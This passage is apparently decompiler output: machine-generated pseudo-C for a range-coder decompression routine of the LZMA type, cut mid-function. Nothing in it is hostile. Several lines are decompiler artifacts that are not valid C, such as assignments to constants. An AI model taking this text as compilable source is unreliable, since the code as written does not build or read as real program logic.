                                                                                                                        							L24:
                                                                                                                        							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                        							 *(_t613 - 0x84) = 6;
                                                                                                                        							 *(_t613 - 0x4c) = _t554;
                                                                                                                        							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                        							goto L132;
                                                                                                                        						case 3:
                                                                                                                        							L21:
                                                                                                                        							__eflags =  *(_t613 - 0x6c);
                                                                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                                                                        								 *(_t613 - 0x88) = 3;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        							_t67 = _t613 - 0x70;
                                                                                                                        							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        							__eflags =  *_t67;
                                                                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                        							L23:
                                                                                                                        							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                        							if( *(_t613 - 0x48) != 0) {
                                                                                                                        								goto L21;
                                                                                                                        							}
                                                                                                                        							goto L24;
                                                                                                                        						case 4:
                                                                                                                        							goto L133;
                                                                                                                        						case 5:
                                                                                                                        							goto L137;
                                                                                                                        						case 6:
                                                                                                                        							__edx = 0;
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__eax =  *(__ebp - 4);
                                                                                                                        								__ecx =  *(__ebp - 0x38);
                                                                                                                        								 *(__ebp - 0x34) = 1;
                                                                                                                        								 *(__ebp - 0x84) = 7;
                                                                                                                        								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                        								goto L132;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                        							__esi =  *(__ebp - 0x60);
                                                                                                                        							__cl = 8;
                                                                                                                        							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                        							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                        							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                        							__ecx =  *(__ebp - 0x3c);
                                                                                                                        							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                        							__ecx =  *(__ebp - 4);
                                                                                                                        							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                        							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                        							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                        							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        							if( *(__ebp - 0x38) >= 4) {
                                                                                                                        								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                        								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                        									_t98 = __ebp - 0x38;
                                                                                                                        									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                        									__eflags =  *_t98;
                                                                                                                        								} else {
                                                                                                                        									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x38) = 0;
                                                                                                                        							}
                                                                                                                        							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                        							if( *(__ebp - 0x34) == __edx) {
                                                                                                                        								__ebx = 0;
                                                                                                                        								__ebx = 1;
                                                                                                                        								goto L61;
                                                                                                                        							} else {
                                                                                                                        								__eax =  *(__ebp - 0x14);
                                                                                                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        									__eflags = __eax;
                                                                                                                        								}
                                                                                                                        								__ecx =  *(__ebp - 8);
                                                                                                                        								__ebx = 0;
                                                                                                                        								__ebx = 1;
                                                                                                                        								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        								goto L41;
                                                                                                                        							}
                                                                                                                        						case 7:
                                                                                                                        							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                        							if( *(__ebp - 0x40) != 1) {
                                                                                                                        								__eax =  *(__ebp - 0x24);
                                                                                                                        								 *(__ebp - 0x80) = 0x16;
                                                                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        								__eax =  *(__ebp - 0x28);
                                                                                                                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        								__eax =  *(__ebp - 0x2c);
                                                                                                                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        								__eax = 0;
                                                                                                                        								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        								__al = __al & 0x000000fd;
                                                                                                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        								__eax =  *(__ebp - 4);
                                                                                                                        								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								 *(__ebp - 0x58) = __eax;
                                                                                                                        								goto L69;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 4);
                                                                                                                        							__ecx =  *(__ebp - 0x38);
                                                                                                                        							 *(__ebp - 0x84) = 8;
                                                                                                                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                        							goto L132;
                                                                                                                        						case 8:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__eax =  *(__ebp - 4);
                                                                                                                        								__ecx =  *(__ebp - 0x38);
                                                                                                                        								 *(__ebp - 0x84) = 0xa;
                                                                                                                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                        							} else {
                                                                                                                        								__eax =  *(__ebp - 0x38);
                                                                                                                        								__ecx =  *(__ebp - 4);
                                                                                                                        								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                        								 *(__ebp - 0x84) = 9;
                                                                                                                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                        							}
                                                                                                                        							goto L132;
                                                                                                                        						case 9:
                                                                                                                        							goto L0;
                                                                                                                        						case 0xa:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__eax =  *(__ebp - 4);
                                                                                                                        								__ecx =  *(__ebp - 0x38);
                                                                                                                        								 *(__ebp - 0x84) = 0xb;
                                                                                                                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                        								goto L132;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x28);
                                                                                                                        							goto L88;
                                                                                                                        						case 0xb:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__ecx =  *(__ebp - 0x24);
                                                                                                                        								__eax =  *(__ebp - 0x20);
                                                                                                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        							} else {
                                                                                                                        								__eax =  *(__ebp - 0x24);
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x28);
                                                                                                                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        							L88:
                                                                                                                        							__ecx =  *(__ebp - 0x2c);
                                                                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                                                                        							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        							goto L89;
                                                                                                                        						case 0xc:
                                                                                                                        							L99:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0xc;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t334 = __ebp - 0x70;
                                                                                                                        							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t334;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							__eax =  *(__ebp - 0x2c);
                                                                                                                        							goto L101;
                                                                                                                        						case 0xd:
                                                                                                                        							L37:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0xd;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t122 = __ebp - 0x70;
                                                                                                                        							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t122;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							L39:
                                                                                                                        							__eax =  *(__ebp - 0x40);
                                                                                                                        							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                        								goto L48;
                                                                                                                        							}
                                                                                                                        							__eflags = __ebx - 0x100;
                                                                                                                        							if(__ebx >= 0x100) {
                                                                                                                        								goto L54;
                                                                                                                        							}
                                                                                                                        							L41:
                                                                                                                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                        							__ecx =  *(__ebp - 0x58);
                                                                                                                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                        							 *(__ebp - 0x48) = __eax;
                                                                                                                        							__eax = __eax + 1;
                                                                                                                        							__eax = __eax << 8;
                                                                                                                        							__eax = __eax + __ebx;
                                                                                                                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							 *(__ebp - 0x54) = __esi;
                                                                                                                        							__edx = __ax & 0x0000ffff;
                                                                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								 *(__ebp - 0x40) = 1;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								__ebx = __ebx + __ebx + 1;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                                                                        								0x800 = 0x800 - __edx;
                                                                                                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        								goto L39;
                                                                                                                        							} else {
                                                                                                                        								goto L37;
                                                                                                                        							}
                                                                                                                        						case 0xe:
                                                                                                                        							L46:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0xe;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t156 = __ebp - 0x70;
                                                                                                                        							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t156;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							while(1) {
                                                                                                                        								L48:
                                                                                                                        								__eflags = __ebx - 0x100;
                                                                                                                        								if(__ebx >= 0x100) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								__eax =  *(__ebp - 0x58);
                                                                                                                        								__edx = __ebx + __ebx;
                                                                                                                        								__ecx =  *(__ebp - 0x10);
                                                                                                                        								__esi = __edx + __eax;
                                                                                                                        								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        								__ax =  *__esi;
                                                                                                                        								 *(__ebp - 0x54) = __esi;
                                                                                                                        								__edi = __ax & 0x0000ffff;
                                                                                                                        								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        									__cx = __ax;
                                                                                                                        									_t170 = __edx + 1; // 0x1
                                                                                                                        									__ebx = _t170;
                                                                                                                        									__cx = __ax >> 5;
                                                                                                                        									__eflags = __eax;
                                                                                                                        									 *__esi = __ax;
                                                                                                                        								} else {
                                                                                                                        									 *(__ebp - 0x10) = __ecx;
                                                                                                                        									0x800 = 0x800 - __edi;
                                                                                                                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        									__ebx = __ebx + __ebx;
                                                                                                                        									 *__esi = __cx;
                                                                                                                        								}
                                                                                                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                                                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									goto L46;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L54:
                                                                                                                        							_t173 = __ebp - 0x34;
                                                                                                                        							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                        							__eflags =  *_t173;
                                                                                                                        							goto L55;
                                                                                                                        						case 0xf:
                                                                                                                        							L58:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0xf;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t203 = __ebp - 0x70;
                                                                                                                        							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t203;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							L60:
                                                                                                                        							__eflags = __ebx - 0x100;
                                                                                                                        							if(__ebx >= 0x100) {
                                                                                                                        								L55:
                                                                                                                        								__al =  *(__ebp - 0x44);
                                                                                                                        								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                        								goto L56;
                                                                                                                        							}
                                                                                                                        							L61:
                                                                                                                        							__eax =  *(__ebp - 0x58);
                                                                                                                        							__edx = __ebx + __ebx;
                                                                                                                        							__ecx =  *(__ebp - 0x10);
                                                                                                                        							__esi = __edx + __eax;
                                                                                                                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							 *(__ebp - 0x54) = __esi;
                                                                                                                        							__edi = __ax & 0x0000ffff;
                                                                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								_t217 = __edx + 1; // 0x1
                                                                                                                        								__ebx = _t217;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                                                                        								0x800 = 0x800 - __edi;
                                                                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        								goto L60;
                                                                                                                        							} else {
                                                                                                                        								goto L58;
                                                                                                                        							}
                                                                                                                        						case 0x10:
                                                                                                                        							L109:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0x10;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t365 = __ebp - 0x70;
                                                                                                                        							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t365;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							goto L111;
                                                                                                                        						case 0x11:
                                                                                                                        							goto L69;
                                                                                                                        						case 0x12:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								__eax =  *(__ebp - 0x58);
                                                                                                                        								 *(__ebp - 0x84) = 0x13;
                                                                                                                        								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                        								goto L132;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x4c);
                                                                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                        							__ecx =  *(__ebp - 0x58);
                                                                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        							__eflags = __eax;
                                                                                                                        							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                        							goto L130;
                                                                                                                        						case 0x13:
                                                                                                                        							__eflags =  *(__ebp - 0x40);
                                                                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                                                                        								_t469 = __ebp - 0x58;
                                                                                                                        								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                        								__eflags =  *_t469;
                                                                                                                        								 *(__ebp - 0x30) = 0x10;
                                                                                                                        								 *(__ebp - 0x40) = 8;
                                                                                                                        								L144:
                                                                                                                        								 *(__ebp - 0x7c) = 0x14;
                                                                                                                        								goto L145;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x4c);
                                                                                                                        							__ecx =  *(__ebp - 0x58);
                                                                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        							 *(__ebp - 0x30) = 8;
                                                                                                                        							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                        							L130:
                                                                                                                        							 *(__ebp - 0x58) = __eax;
                                                                                                                        							 *(__ebp - 0x40) = 3;
                                                                                                                        							goto L144;
                                                                                                                        						case 0x14:
                                                                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                        							__eax =  *(__ebp - 0x80);
                                                                                                                        							goto L140;
                                                                                                                        						case 0x15:
                                                                                                                        							__eax = 0;
                                                                                                                        							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        							__al = __al & 0x000000fd;
                                                                                                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        							goto L120;
                                                                                                                        						case 0x16:
                                                                                                                        							__eax =  *(__ebp - 0x30);
                                                                                                                        							__eflags = __eax - 4;
                                                                                                                        							if(__eax >= 4) {
                                                                                                                        								_push(3);
                                                                                                                        								_pop(__eax);
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 4);
                                                                                                                        							 *(__ebp - 0x40) = 6;
                                                                                                                        							__eax = __eax << 7;
                                                                                                                        							 *(__ebp - 0x7c) = 0x19;
                                                                                                                        							 *(__ebp - 0x58) = __eax;
                                                                                                                        							goto L145;
                                                                                                                        						case 0x17:
                                                                                                                        							L145:
                                                                                                                        							__eax =  *(__ebp - 0x40);
                                                                                                                        							 *(__ebp - 0x50) = 1;
                                                                                                                        							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                        							goto L149;
                                                                                                                        						case 0x18:
                                                                                                                        							L146:
                                                                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0x18;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x70);
                                                                                                                        							__eax =  *(__ebp - 0xc);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							_t484 = __ebp - 0x70;
                                                                                                                        							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                        							__eflags =  *_t484;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        							L148:
                                                                                                                        							_t487 = __ebp - 0x48;
                                                                                                                        							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                        							__eflags =  *_t487;
                                                                                                                        							L149:
                                                                                                                        							__eflags =  *(__ebp - 0x48);
                                                                                                                        							if( *(__ebp - 0x48) <= 0) {
                                                                                                                        								__ecx =  *(__ebp - 0x40);
                                                                                                                        								__ebx =  *(__ebp - 0x50);
                                                                                                                        								0 = 1;
                                                                                                                        								__eax = 1 << __cl;
                                                                                                                        								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                        								__eax =  *(__ebp - 0x7c);
                                                                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                                                                        								goto L140;
                                                                                                                        							}
                                                                                                                        							__eax =  *(__ebp - 0x50);
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        							__eax =  *(__ebp - 0x58);
                                                                                                                        							__esi = __edx + __eax;
                                                                                                                        							 *(__ebp - 0x54) = __esi;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							__edi = __ax & 0x0000ffff;
                                                                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__eax = __eax - __ecx;
                                                                                                                        								__edx = __edx + 1;
                                                                                                                        								__eflags = __edx;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        								 *(__ebp - 0x50) = __edx;
                                                                                                                        							} else {
                                                                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                                                                        								0x800 = 0x800 - __edi;
                                                                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        								goto L148;
                                                                                                                        							} else {
                                                                                                                        								goto L146;
                                                                                                                        							}
                                                                                                                        						case 0x19:
                                                                                                                        							__eflags = __ebx - 4;
                                                                                                                        							if(__ebx < 4) {
                                                                                                                        								 *(__ebp - 0x2c) = __ebx;
                                                                                                                        								L119:
                                                                                                                        								_t393 = __ebp - 0x2c;
                                                                                                                        								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                        								__eflags =  *_t393;
                                                                                                                        								L120:
                                                                                                                        								__eax =  *(__ebp - 0x2c);
                                                                                                                        								__eflags = __eax;
                                                                                                                        								if(__eax == 0) {
                                                                                                                        									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                        									goto L170;
                                                                                                                        								}
                                                                                                                        								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                        								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                        									goto L171;
                                                                                                                        								}
                                                                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                        								__eax =  *(__ebp - 0x30);
                                                                                                                        								_t400 = __ebp - 0x60;
